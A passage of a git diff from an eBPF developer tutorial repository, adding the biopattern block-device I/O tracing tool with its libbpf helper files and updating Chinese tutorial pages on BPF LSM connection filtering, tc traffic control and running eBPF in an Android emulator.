NULL, 10); + if (errno) { + fprintf(stderr, "invalid internal\n"); + argp_usage(state); + } + } else if (pos_args == 1) { + env.times = strtol(arg, NULL, 10); + if (errno) { + fprintf(stderr, "invalid times\n"); + argp_usage(state); + } + } else { + fprintf(stderr, + "unrecognized positional argument: %s\n", arg); + argp_usage(state); + } + pos_args++; + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + if (level == LIBBPF_DEBUG && !env.verbose) + return 0; + return vfprintf(stderr, format, args); +} + +static void sig_handler(int sig) +{ + exiting = true; +} + +static int print_map(struct bpf_map *counters, struct partitions *partitions) +{ + __u32 total, lookup_key = -1, next_key; + int err, fd = bpf_map__fd(counters); + const struct partition *partition; + struct counter counter; + struct tm *tm; + char ts[32]; + time_t t; + + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_lookup_elem(fd, &next_key, &counter); + if (err < 0) { + fprintf(stderr, "failed to lookup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + total = counter.sequential + counter.random; + if (!total) + continue; + if (env.timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-9s ", ts); + } + partition = partitions__get_by_dev(partitions, next_key); + printf("%-7s %5ld %5ld %8d %10lld\n", + partition ? partition->name : "Unknown", + counter.random * 100L / total, + counter.sequential * 100L / total, total, + counter.bytes / 1024); + } + + lookup_key = -1; + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_delete_elem(fd, &next_key); + if (err < 0) { + fprintf(stderr, "failed to cleanup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + } + + return 0; +} + +int main(int argc, char **argv) +{ + LIBBPF_OPTS(bpf_object_open_opts, open_opts); + struct partitions *partitions = NULL; + const struct partition *partition; + static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, + }; + struct biopattern_bpf *obj; + int err; + + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) + return err; + + libbpf_set_print(libbpf_print_fn); + + obj = biopattern_bpf__open_opts(&open_opts); + if (!obj) { + fprintf(stderr, "failed to open BPF object\n"); + return 1; + } + + partitions = partitions__load(); + if (!partitions) { + fprintf(stderr, "failed to load partitions info\n"); + goto cleanup; + } + + /* initialize global data (filtering options) */ + if (env.disk) { + partition = partitions__get_by_name(partitions, env.disk); + if (!partition) { + fprintf(stderr, "invaild partition name: not exist\n"); + goto cleanup; + } + obj->rodata->filter_dev = true; + obj->rodata->targ_dev = partition->dev; + } + + err = biopattern_bpf__load(obj); + if (err) { + fprintf(stderr, "failed to load BPF object: %d\n", err); + goto cleanup; + } + + err = biopattern_bpf__attach(obj); + if (err) { + fprintf(stderr, "failed to attach BPF programs\n"); + goto cleanup; + } + + signal(SIGINT, sig_handler); + + printf("Tracing block device I/O requested seeks... Hit Ctrl-C to " + "end.\n"); + if (env.timestamp) + printf("%-9s ", "TIME"); + printf("%-7s %5s %5s %8s %10s\n", "DISK", "%RND", "%SEQ", + "COUNT", "KBYTES"); + + /* main: poll */ + while (1) { + sleep(env.interval); + + err = print_map(obj->maps.counters, partitions); + if (err) + break; + + if (exiting || --env.times == 0) + break; + } + +cleanup: + biopattern_bpf__destroy(obj); + partitions__free(partitions); + + return err != 0; +} diff --git a/17-biopattern/biopattern.h b/17-biopattern/biopattern.h new file mode 100644 index 0000000..18860a5 --- /dev/null +++ b/17-biopattern/biopattern.h @@ -0,0 +1,14 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +#ifndef __BIOPATTERN_H +#define __BIOPATTERN_H + +#define DISK_NAME_LEN 32 + +struct counter { + __u64 last_sector; + __u64 bytes; + __u32 sequential; + __u32 random; +}; + +#endif /* __BIOPATTERN_H */ diff --git a/17-biopattern/core_fixes.bpf.h b/17-biopattern/core_fixes.bpf.h new file mode 100644 index 0000000..552c9fa --- /dev/null +++ b/17-biopattern/core_fixes.bpf.h @@ -0,0 +1,169 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2021 Hengqi Chen */ + +#ifndef __CORE_FIXES_BPF_H +#define __CORE_FIXES_BPF_H + +#include +#include + +/** + * commit 2f064a59a1 ("sched: Change task_struct::state") changes + * the name of task_struct::state to task_struct::__state + * see: + * https://github.com/torvalds/linux/commit/2f064a59a1 + */ +struct task_struct___o { + volatile long int state; +} __attribute__((preserve_access_index)); + +struct task_struct___x { + unsigned int __state; +} __attribute__((preserve_access_index)); + +static __always_inline __s64 get_task_state(void *task) +{ + struct task_struct___x *t = task; + + if (bpf_core_field_exists(t->__state)) + return BPF_CORE_READ(t, __state); + return BPF_CORE_READ((struct task_struct___o *)task, state); +} + +/** + * commit 309dca309fc3 ("block: store a block_device pointer in struct bio") + * adds a new member bi_bdev which is a pointer to struct block_device + * see: + * https://github.com/torvalds/linux/commit/309dca309fc3 + */ +struct bio___o { + struct gendisk *bi_disk; +} __attribute__((preserve_access_index)); + +struct bio___x { + struct block_device *bi_bdev; +} __attribute__((preserve_access_index)); + +static __always_inline struct gendisk *get_gendisk(void *bio) +{ + struct bio___x *b = bio; + + if (bpf_core_field_exists(b->bi_bdev)) + return BPF_CORE_READ(b, bi_bdev, bd_disk); + return BPF_CORE_READ((struct bio___o *)bio, bi_disk); +} + +/** + * commit d5869fdc189f ("block: introduce block_rq_error tracepoint") + * adds a new tracepoint block_rq_error and it shares the same arguments + * with tracepoint block_rq_complete. As a result, the kernel BTF now has + * a `struct trace_event_raw_block_rq_completion` instead of + * `struct trace_event_raw_block_rq_complete`. + * see: + * https://github.com/torvalds/linux/commit/d5869fdc189f + */ +struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; +} __attribute__((preserve_access_index)); + +static __always_inline bool has_block_rq_completion() +{ + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; +} + +/** + * commit d152c682f03c ("block: add an explicit ->disk backpointer to the + * request_queue") and commit f3fa33acca9f ("block: remove the ->rq_disk + * field in struct request") make some changes to `struct request` and + * `struct request_queue`. Now, to get the `struct gendisk *` field in a CO-RE + * way, we need both `struct request` and `struct request_queue`. + * see: + * https://github.com/torvalds/linux/commit/d152c682f03c + * https://github.com/torvalds/linux/commit/f3fa33acca9f + */ +struct request_queue___x { + struct gendisk *disk; +} __attribute__((preserve_access_index)); + +struct request___x { + struct request_queue___x *q; + struct gendisk *rq_disk; +} __attribute__((preserve_access_index)); + +static __always_inline struct gendisk *get_disk(void *request) +{ + struct request___x *r = request; + + if (bpf_core_field_exists(r->rq_disk)) + return BPF_CORE_READ(r, rq_disk); + return BPF_CORE_READ(r, q, disk); +} + +/** + * commit 6521f8917082("namei: prepare for idmapped mounts") add `struct + * user_namespace *mnt_userns` as vfs_create() and vfs_unlink() first argument. + * At the same time, struct renamedata {} add `struct user_namespace + * *old_mnt_userns` item. Now, to kprobe vfs_create()/vfs_unlink() in a CO-RE + * way, determine whether there is a `old_mnt_userns` field for `struct + * renamedata` to decide which input parameter of the vfs_create() to use as + * `dentry`. + * see: + * https://github.com/torvalds/linux/commit/6521f8917082 + */ +struct renamedata___x { + struct user_namespace *old_mnt_userns; +} __attribute__((preserve_access_index)); + +static __always_inline bool renamedata_has_old_mnt_userns_field(void) +{ + if (bpf_core_field_exists(struct renamedata___x, old_mnt_userns)) + return true; + return false; +} + +/** + * commit 3544de8ee6e4("mm, tracing: record slab name for kmem_cache_free()") + * replaces `trace_event_raw_kmem_free` with `trace_event_raw_kfree` and adds + * `tracepoint_kmem_cache_free` to enhance the information recorded for + * `kmem_cache_free`. + * see: + * https://github.com/torvalds/linux/commit/3544de8ee6e4 + */ + +struct trace_event_raw_kmem_free___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_kfree___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_kmem_cache_free___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +static __always_inline bool has_kfree() +{ + if (bpf_core_type_exists(struct trace_event_raw_kfree___x)) + return true; + return false; +} + +static __always_inline bool has_kmem_cache_free() +{ + if (bpf_core_type_exists(struct trace_event_raw_kmem_cache_free___x)) + return true; + return false; +} + +#endif /* __CORE_FIXES_BPF_H */ diff --git a/17-biopattern/index.html b/17-biopattern/index.html index df214d3..364e57e 100644 --- a/17-biopattern/index.html +++ b/17-biopattern/index.html @@ -83,7 +83,7 @@ diff --git a/17-biopattern/maps.bpf.h b/17-biopattern/maps.bpf.h new file mode 100644 index 0000000..51d1012 --- /dev/null +++ b/17-biopattern/maps.bpf.h @@ -0,0 +1,26 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +// Copyright (c) 2020 Anton Protopopov +#ifndef __MAPS_BPF_H +#define __MAPS_BPF_H + +#include +#include + +static __always_inline void * +bpf_map_lookup_or_try_init(void *map, const void *key, const void *init) +{ + void *val; + long err; + + val = bpf_map_lookup_elem(map, key); + if (val) + return val; + + err = bpf_map_update_elem(map, key, init, BPF_NOEXIST); + if (err && err != -EEXIST) + return 0; + + return bpf_map_lookup_elem(map, key); +} + +#endif /* __MAPS_BPF_H */ diff --git a/17-biopattern/trace_helpers.c b/17-biopattern/trace_helpers.c new file mode 100644 index 0000000..e873d35 --- /dev/null +++ b/17-biopattern/trace_helpers.c @@ -0,0 +1,452 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +// Copyright (c) 2020 Wenbo Zhang +// +// Based on ksyms improvements from Andrii Nakryiko, add more helpers. +// 28-Feb-2020 Wenbo Zhang Created this. +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "trace_helpers.h" + +#define min(x, y) ({ \ + typeof(x) _min1 = (x); \ + typeof(y) _min2 = (y); \ + (void) (&_min1 == &_min2); \ + _min1 < _min2 ? _min1 : _min2; }) + +#define DISK_NAME_LEN 32 + +#define MINORBITS 20 +#define MINORMASK ((1U << MINORBITS) - 1) + +#define MKDEV(ma, mi) (((ma) << MINORBITS) | (mi)) + +struct ksyms { + struct ksym *syms; + int syms_sz; + int syms_cap; + char *strs; + int strs_sz; + int strs_cap; +}; + +struct partitions { + struct partition *items; + int sz; +}; + +static int partitions__add_partition(struct partitions *partitions, + const char *name, unsigned int dev) +{ + struct partition *partition; + void *tmp; + + tmp = realloc(partitions->items, (partitions->sz + 1) * + sizeof(*partitions->items)); + if (!tmp) + return -1; + partitions->items = tmp; + partition = &partitions->items[partitions->sz]; + partition->name = strdup(name); + partition->dev = dev; + partitions->sz++; + + return 0; +} + +struct partitions *partitions__load(void) +{ + char part_name[DISK_NAME_LEN]; + unsigned int devmaj, devmin; + unsigned long long nop; + struct partitions *partitions; + char buf[64]; + FILE *f; + + f = fopen("/proc/partitions", "r"); + if (!f) + return NULL; + + partitions = calloc(1, sizeof(*partitions)); + if (!partitions) + goto err_out; + + while (fgets(buf, sizeof(buf), f) != NULL) { + /* skip heading */ + if (buf[0] != ' ' || buf[0] == '\n') + continue; + if (sscanf(buf, "%u %u %llu %s", &devmaj, &devmin, &nop, + part_name) != 4) + goto err_out; + if (partitions__add_partition(partitions, part_name, + MKDEV(devmaj, devmin))) + goto err_out; + } + + fclose(f); + return partitions; + +err_out: + partitions__free(partitions); + fclose(f); + return NULL; +} + +void partitions__free(struct partitions *partitions) +{ + int i; + + if (!partitions) + return; + + for (i = 0; i < partitions->sz; i++) + free(partitions->items[i].name); + free(partitions->items); + free(partitions); +} + +const struct partition * +partitions__get_by_dev(const struct partitions *partitions, unsigned int dev) +{ + int i; + + for (i = 0; i < partitions->sz; i++) { + if (partitions->items[i].dev == dev) + return &partitions->items[i]; + } + + return NULL; +} + +const struct partition * +partitions__get_by_name(const struct partitions *partitions, const char *name) +{ + int i; + + for (i = 0; i < partitions->sz; i++) { + if (strcmp(partitions->items[i].name, name) == 0) + return &partitions->items[i]; + } + + return NULL; +} + +static void print_stars(unsigned int val, unsigned int val_max, int width) +{ + int num_stars, num_spaces, i; + bool need_plus; + + num_stars = min(val, val_max) * width / val_max; + num_spaces = width - num_stars; + need_plus = val > val_max; + + for (i = 0; i < num_stars; i++) + printf("*"); + for (i = 0; i < num_spaces; i++) + printf(" "); + if (need_plus) + printf("+"); +} + +void print_log2_hist(unsigned int *vals, int vals_size, const char *val_type) +{ + int stars_max = 40, idx_max = -1; + unsigned int val, val_max = 0; + unsigned long long low, high; + int stars, width, i; + + for (i = 0; i < vals_size; i++) { + val = vals[i]; + if (val > 0) + idx_max = i; + if (val > val_max) + val_max = val; + } + + if (idx_max < 0) + return; + + printf("%*s%-*s : count distribution\n", idx_max <= 32 ? 5 : 15, "", + idx_max <= 32 ? 19 : 29, val_type); + + if (idx_max <= 32) + stars = stars_max; + else + stars = stars_max / 2; + + for (i = 0; i <= idx_max; i++) { + low = (1ULL << (i + 1)) >> 1; + high = (1ULL << (i + 1)) - 1; + if (low == high) + low -= 1; + val = vals[i]; + width = idx_max <= 32 ? 10 : 20; + printf("%*lld -> %-*lld : %-8d |", width, low, width, high, val); + print_stars(val, val_max, stars); + printf("|\n"); + } +} + +void print_linear_hist(unsigned int *vals, int vals_size, unsigned int base, + unsigned int step, const char *val_type) +{ + int i, stars_max = 40, idx_min = -1, idx_max = -1; + unsigned int val, val_max = 0; + + for (i = 0; i < vals_size; i++) { + val = vals[i]; + if (val > 0) { + idx_max = i; + if (idx_min < 0) + idx_min = i; + } + if (val > val_max) + val_max = val; + } + + if (idx_max < 0) + return; + + printf(" %-13s : count distribution\n", val_type); + for (i = idx_min; i <= idx_max; i++) { + val = vals[i]; + if (!val) + continue; + printf(" %-10d : %-8d |", base + i * step, val); + print_stars(val, val_max, stars_max); + printf("|\n"); + } +} + +unsigned long long get_ktime_ns(void) +{ + struct timespec ts; + + clock_gettime(CLOCK_MONOTONIC, &ts); + return ts.tv_sec * NSEC_PER_SEC + ts.tv_nsec; +} + +bool is_kernel_module(const char *name) +{ + bool found = false; + char buf[64]; + FILE *f; + + f = fopen("/proc/modules", "r"); + if (!f) + return false; + + while (fgets(buf, sizeof(buf), f) != NULL) { + if (sscanf(buf, "%s %*s\n", buf) != 1) + break; + if (!strcmp(buf, name)) { + found = true; + break; + } + } + + fclose(f); + return found; +} + +static bool fentry_try_attach(int id) +{ + int prog_fd, attach_fd; + char error[4096]; + struct bpf_insn insns[] = { + { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }, + { .code = BPF_JMP | BPF_EXIT }, + }; + LIBBPF_OPTS(bpf_prog_load_opts, opts, + .expected_attach_type = BPF_TRACE_FENTRY, + .attach_btf_id = id, + .log_buf = error, + .log_size = sizeof(error), + ); + + prog_fd = bpf_prog_load(BPF_PROG_TYPE_TRACING, "test", "GPL", insns, + sizeof(insns) / sizeof(struct bpf_insn), &opts); + if (prog_fd < 0) + return false; + + attach_fd = bpf_raw_tracepoint_open(NULL, prog_fd); + if (attach_fd >= 0) + close(attach_fd); + + close(prog_fd); + return attach_fd >= 0; +} + +bool fentry_can_attach(const char *name, const char *mod) +{ + struct btf *btf, *vmlinux_btf, *module_btf = NULL; + int err, id; + + vmlinux_btf = btf__load_vmlinux_btf(); + err = libbpf_get_error(vmlinux_btf); + if (err) + return false; + + btf = vmlinux_btf; + + if (mod) { + module_btf = btf__load_module_btf(mod, vmlinux_btf); + err = libbpf_get_error(module_btf); + if (!err) + btf = module_btf; + } + + id = btf__find_by_name_kind(btf, name, BTF_KIND_FUNC); + + btf__free(module_btf); + btf__free(vmlinux_btf); + return id > 0 && fentry_try_attach(id); +} + +bool kprobe_exists(const char *name) +{ + char addr_range[256]; + char sym_name[256]; + FILE *f; + int ret; + + f = fopen("/sys/kernel/debug/kprobes/blacklist", "r"); + if (!f) + goto avail_filter; + + while (true) { + ret = fscanf(f, "%s %s%*[^\n]\n", addr_range, sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 2) { + fprintf(stderr, "failed to read symbol from kprobe blacklist\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return false; + } + } + fclose(f); + +avail_filter: + f = fopen("/sys/kernel/debug/tracing/available_filter_functions", "r"); + if (!f) + goto slow_path; + + while (true) { + ret = fscanf(f, "%s%*[^\n]\n", sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 1) { + fprintf(stderr, "failed to read symbol from available_filter_functions\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return true; + } + } + + fclose(f); + return false; + +slow_path: + f = fopen("/proc/kallsyms", "r"); + if (!f) + return false; + + while (true) { + ret = fscanf(f, "%*x %*c %s%*[^\n]\n", sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 1) { + fprintf(stderr, "failed to read symbol from kallsyms\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return true; + } + } + + fclose(f); + return false; +} + +bool tracepoint_exists(const char *category, const char *event) +{ + char path[PATH_MAX]; + + snprintf(path, sizeof(path), "/sys/kernel/debug/tracing/events/%s/%s/format", category, event); + if (!access(path, F_OK)) + return true; + return false; +} + +bool vmlinux_btf_exists(void) +{ + struct btf *btf; + int err; + + btf = btf__load_vmlinux_btf(); + err = libbpf_get_error(btf); + if (err) + return false; + + btf__free(btf); + return true; +} + +bool module_btf_exists(const char *mod) +{ + char sysfs_mod[80]; + + if (mod) { + snprintf(sysfs_mod, sizeof(sysfs_mod), "/sys/kernel/btf/%s", mod); + if (!access(sysfs_mod, R_OK)) + return true; + } + return false; +} + +bool probe_tp_btf(const char *name) +{ + LIBBPF_OPTS(bpf_prog_load_opts, opts, .expected_attach_type = BPF_TRACE_RAW_TP); + struct bpf_insn insns[] = { + { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }, + { .code = BPF_JMP | BPF_EXIT }, + }; + int fd, insn_cnt = sizeof(insns) / sizeof(struct bpf_insn); + + opts.attach_btf_id = libbpf_find_vmlinux_btf_id(name, BPF_TRACE_RAW_TP); + fd = bpf_prog_load(BPF_PROG_TYPE_TRACING, NULL, "GPL", insns, insn_cnt, &opts); + if (fd >= 0) + close(fd); + return fd >= 0; +} + +bool probe_ringbuf() +{ + int map_fd; + + map_fd = bpf_map_create(BPF_MAP_TYPE_RINGBUF, NULL, 0, 0, getpagesize(), NULL); + if (map_fd < 0) + return false; + + close(map_fd); + return true; +} diff --git a/17-biopattern/trace_helpers.h b/17-biopattern/trace_helpers.h new file mode 100644 index 0000000..171bc4e --- /dev/null +++ b/17-biopattern/trace_helpers.h @@ -0,0 +1,104 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#ifndef __TRACE_HELPERS_H +#define __TRACE_HELPERS_H + +#include + +#define NSEC_PER_SEC 1000000000ULL + +struct ksym { + const char *name; + unsigned long addr; +}; + +struct ksyms; + +struct ksyms *ksyms__load(void); +void ksyms__free(struct ksyms *ksyms); +const struct ksym *ksyms__map_addr(const struct ksyms *ksyms, + unsigned long addr); +const struct ksym *ksyms__get_symbol(const struct ksyms *ksyms, + const char *name); + +struct sym { + const char *name; + unsigned long start; + unsigned long size; + unsigned long offset; +}; + +struct syms; + +struct syms *syms__load_pid(int tgid); +struct syms *syms__load_file(const char *fname); +void syms__free(struct syms *syms); +const struct sym *syms__map_addr(const struct syms *syms, unsigned long addr); +const struct sym *syms__map_addr_dso(const struct syms *syms, unsigned long addr, + char **dso_name, unsigned long *dso_offset); + +struct syms_cache; + +struct syms_cache *syms_cache__new(int nr); +struct syms *syms_cache__get_syms(struct syms_cache *syms_cache, int tgid); +void syms_cache__free(struct syms_cache *syms_cache); + +struct partition { + char *name; + unsigned int dev; +}; + +struct partitions; + +struct partitions *partitions__load(void); +void partitions__free(struct partitions *partitions); +const struct partition * +partitions__get_by_dev(const struct partitions *partitions, unsigned int dev); +const struct partition * +partitions__get_by_name(const struct partitions *partitions, const char *name); + +void print_log2_hist(unsigned int *vals, int vals_size, const char *val_type); +void print_linear_hist(unsigned int *vals, int vals_size, unsigned int base, + unsigned int step, const char *val_type); + +unsigned long long get_ktime_ns(void); + +bool is_kernel_module(const char *name); + +/* + * When attempting to use kprobe/kretprobe, please check out new fentry/fexit + * probes, as they provide better performance and usability. But in some + * situations we have to fallback to kprobe/kretprobe probes. This helper + * is used to detect fentry/fexit support for the specified kernel function. + * + * 1. A gap between kernel versions, kernel BTF is exposed + * starting from 5.4 kernel. but fentry/fexit is actually + * supported starting from 5.5. + * 2. Whether kernel supports module BTF or not + * + * *name* is the name of a kernel function to be attached to, which can be + * from vmlinux or a kernel module. + * *mod* is a hint that indicates the *name* may reside in module BTF, + * if NULL, it means *name* belongs to vmlinux. + */ +bool fentry_can_attach(const char *name, const char *mod); + +/* + * The name of a kernel function to be attached to may be changed between + * kernel releases. This helper is used to confirm whether the target kernel + * uses a certain function name before attaching. + * + * It is achieved by scaning + * /sys/kernel/debug/tracing/available_filter_functions + * If this file does not exist, it fallbacks to parse /proc/kallsyms, + * which is slower. + */ +bool kprobe_exists(const char *name); +bool tracepoint_exists(const char *category, const char *event); + +bool vmlinux_btf_exists(void); +bool module_btf_exists(const char *mod); + +bool probe_tp_btf(const char *name); +bool probe_ringbuf(); + +#endif /* __TRACE_HELPERS_H */ diff --git a/18-further-reading/index.html b/18-further-reading/index.html index 0d8a574..5577eef 100644 --- a/18-further-reading/index.html +++ b/18-further-reading/index.html @@ -83,7 +83,7 @@ diff --git a/19-lsm-connect/index.html b/19-lsm-connect/index.html index 53dd263..3e12cb6 100644 --- a/19-lsm-connect/index.html +++ b/19-lsm-connect/index.html @@ -83,7 +83,7 @@ @@ -145,6 +145,7 @@

eBPF 入门实践教程:使用 LSM 进行安全检测防御

+

eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。安全方面的 eBPF 应用也是如此,本文将介绍如何使用 eBPF LSM(Linux Security Modules)机制实现一个简单的安全检查程序。

背景

LSM 从 Linux 2.6 开始成为官方内核的一个安全框架,基于此的安全实现包括 SELinux 和 AppArmor 等。在 Linux 5.7 引入 BPF LSM 后,系统开发人员已经能够自由地实现函数粒度的安全检查能力,本文就提供了这样一个案例:限制通过 socket connect 函数对特定 IPv4 地址进行访问的 BPF LSM 程序。(可见其控制精度是很高的)

LSM 概述

@@ -261,10 +262,10 @@ Retrying. wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009 wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009
+

完整源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/19-lsm-connect

总结

本文介绍了如何使用 BPF LSM 来限制通过 socket 对特定 IPv4 地址的访问。我们可以通过修改 GRUB 配置文件来开启 LSM 的 BPF 挂载点。在 eBPF 程序中,我们通过 BPF_PROG 宏定义函数,并通过 SEC 宏指定挂载点;在函数实现上,遵循 LSM 安全检查模块中 "cannot override a denial" 的原则,并根据 socket 连接请求的目的地址对该请求进行限制。

-

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

参考

diff --git a/20-tc/index.html b/20-tc/index.html index c7fd0c1..562fbc9 100644 --- a/20-tc/index.html +++ b/20-tc/index.html @@ -83,7 +83,7 @@ @@ -144,7 +144,7 @@
-

eBPF 入门实践教程:使用 eBPF 进行 tc 流量控制

+

eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制

背景

Linux 的流量控制子系统(Traffic Control, tc)在内核中存在了多年,类似于 iptables 和 netfilter 的关系,tc 也包括一个用户态的 tc 程序和内核态的 trafiic control 框架,主要用于从速率、顺序等方面控制数据包的发送和接收。从 Linux 4.1 开始,tc 增加了一些新的挂载点,并支持将 eBPF 程序作为 filter 加载到这些挂载点上。

tc 概述

@@ -215,8 +215,7 @@ Packing ebpf object and config into package.json...

总结

本文介绍了如何向 TC 流量控制子系统挂载 eBPF 类型的 filter 来实现对链路层数据包的排队处理。基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 tc BPF 程序以指定选项挂载到目标网络设备,并借助内核的 sk_buff 结构对数据包进行过滤处理。

-

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

参考

  • http://just4coding.com/2022/08/05/tc/
  • @@ -231,7 +230,7 @@ Packing ebpf object and config into package.json... - @@ -245,7 +244,7 @@ Packing ebpf object and config into package.json... - diff --git a/22-android/index.html b/22-android/index.html new file mode 100644 index 0000000..6c0ead2 --- /dev/null +++ b/22-android/index.html @@ -0,0 +1,332 @@ + + + + + + 在 Android 上使用 eBPF 程序 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    在 Andorid 上使用 eBPF 程序

    +
    +

    本文主要记录了笔者在 Android Studio Emulator 中测试高版本 Android Kernel 对基于 libbpf 的 CO-RE 技术支持程度的探索过程、结果和遇到的问题。 +测试采用的方式是在 Android Shell 环境下构建 Debian 环境,并基于此尝试构建 eunomia-bpf 工具链、运行其测试用例。

    +
    +

    背景

    +

    截至目前(2023-04),Android 还未对 eBPF 程序的动态加载做出较好的支持,无论是以 bcc 为代表的带编译器分发方案,还是基于 btf 和 libbpf 的 CO-RE 方案,都在较大程度上离不开 Linux 环境的支持,无法在 Android 系统上很好地运行1

    +

    虽然如此,在 Android 平台上尝试 eBPF 也已经有了一些成功案例,除谷歌官方提供的修改 Android.bp 以将 eBPF 程序随整个系统一同构建并挂载的方案2,也有人提出基于 Android 内核构建 Linux 环境进而运行 eBPF 工具链的思路,并开发了相关工具。

    +

    目前已有的资料,大多基于 adeb/eadb 在 Android 内核基础上构建 Linux 沙箱,并对 bcc 和 bpftrace 相关工具链进行测试,而对 CO-RE 方案的测试工作较少。在 Android 上使用 bcc 工具目前有较多参考资料,如:

    + +

    其主要思路是利用 chroot 在 Android 内核上运行一个 Debian 镜像,并在其中构建整个 bcc 工具链,从而使用 eBPF 工具。如果想要使用 bpftrace,原理也是类似的。

    +

    事实上,高版本的 Android 内核已支持 btf 选项,这意味着 eBPF 领域中新兴的 CO-RE 技术也应当能够运用到基于 Android 内核的 Linux 系统中。本文将基于此对 eunomia-bpf 在模拟器环境下进行测试运行。

    +
    +

    eunomia-bpf 是一个结合了 libbpf 和 WebAssembly 技术的开源项目,旨在简化 eBPF 程序的编写、编译和部署。该项目可被视作 CO-RE 的一种实践方式,其核心依赖是 libbpf,相信对 eunomia-bpf 的测试工作能够为其他 CO-RE 方案提供参考。

    +
    +

    测试环境

    +
      +
    • Android Emulator(Android Studio Flamingo | 2022.2.1)
    • +
    • AVD: Pixel 6
    • +
    • Android Image: Tiramisu Android 13.0 x86_64(5.15.41-android13-8-00055-g4f5025129fe8-ab8949913)
    • +
    +

    环境搭建3

    +
      +
    1. eadb 仓库 的 releases 页面获取 debianfs-amd64-full.tar.gz 作为 Linux 环境的 rootfs,同时还需要获取该项目的 assets 目录来构建环境;
    2. +
    3. 从 Android Studio 的 Device Manager 配置并启动 Android Virtual Device;
    4. +
    5. 通过 Android Studio SDK 的 adb 工具将 debianfs-amd64-full.tar.gzassets 目录推送到 AVD 中: +
        +
      • ./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz
      • +
      • ./adb push assets /data/local/tmp/assets
      • +
      +
    6. +
    7. 通过 adb 进入 Android shell 环境并获取 root 权限: +
        +
      • ./adb shell
      • +
      • su
      • +
      +
    8. +
    9. 在 Android shell 中构建并进入 debian 环境: +
        +
      • mkdir -p /data/eadb
      • +
      • mv /data/local/tmp/assets/* /data/eadb
      • +
      • mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz
      • +
      • rm -r /data/local/tmp/assets
      • +
      • chmod +x /data/eadb/device-*
      • +
      • /data/eadb/device-unpack
      • +
      • /data/eadb/run /data/eadb/debian
      • +
      +
    10. +
    +

    至此,测试 eBPF 所需的 Linux 环境已经构建完毕。此外,在 Android shell 中(未进入 debian 时)可以通过 zcat /proc/config.gz 并配合 grep 查看内核编译选项。

    +
    +

    目前,eadb 打包的 debian 环境存在 libc 版本低,缺少的工具依赖较多等情况;并且由于内核编译选项不同,一些 eBPF 功能可能也无法使用。

    +
    +

    工具构建

    +

    在 debian 环境中将 eunomia-bpf 仓库 clone 到本地,具体的构建过程,可以参考仓库的 build.md。在本次测试中,笔者选用了 ecc 编译生成 package.json 的方式,该工具的构建和使用方式请参考仓库页面

    +
    +

    在构建过程中,可能需要自行安装包括但不限于 curlpkg-configlibssl-dev 等工具。

    +
    +

    结果

    +

